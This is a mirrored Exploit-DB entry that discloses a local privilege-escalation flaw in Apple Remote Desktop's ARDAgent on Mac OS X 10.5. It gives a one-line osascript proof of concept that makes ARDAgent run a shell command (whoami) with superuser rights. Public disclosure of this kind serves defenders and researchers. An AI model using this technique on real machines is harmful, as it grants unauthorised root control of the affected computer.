exploit-db-mirror/platforms/osx/local/31940.txt
Offensive Security 0007ea1915 Updated 02_28_2014
2014-02-28 04:28:49 +00:00

9 lines
No EOL
476 B
Text
Executable file

source: http://www.securityfocus.com/bid/29831/info
Mac OS X is prone to a local privilege-escalation vulnerability affecting ARDAgent (Apple Remote Desktop).
Successful exploits allow local attackers to execute arbitrary code with superuser privileges, completely compromising the affected computer.
This issue is confirmed to affect Mac OS X 10.5 versions; earlier versions may also be vulnerable.
osascript -e 'tell app "ARDAgent" to do shell script "whoami"';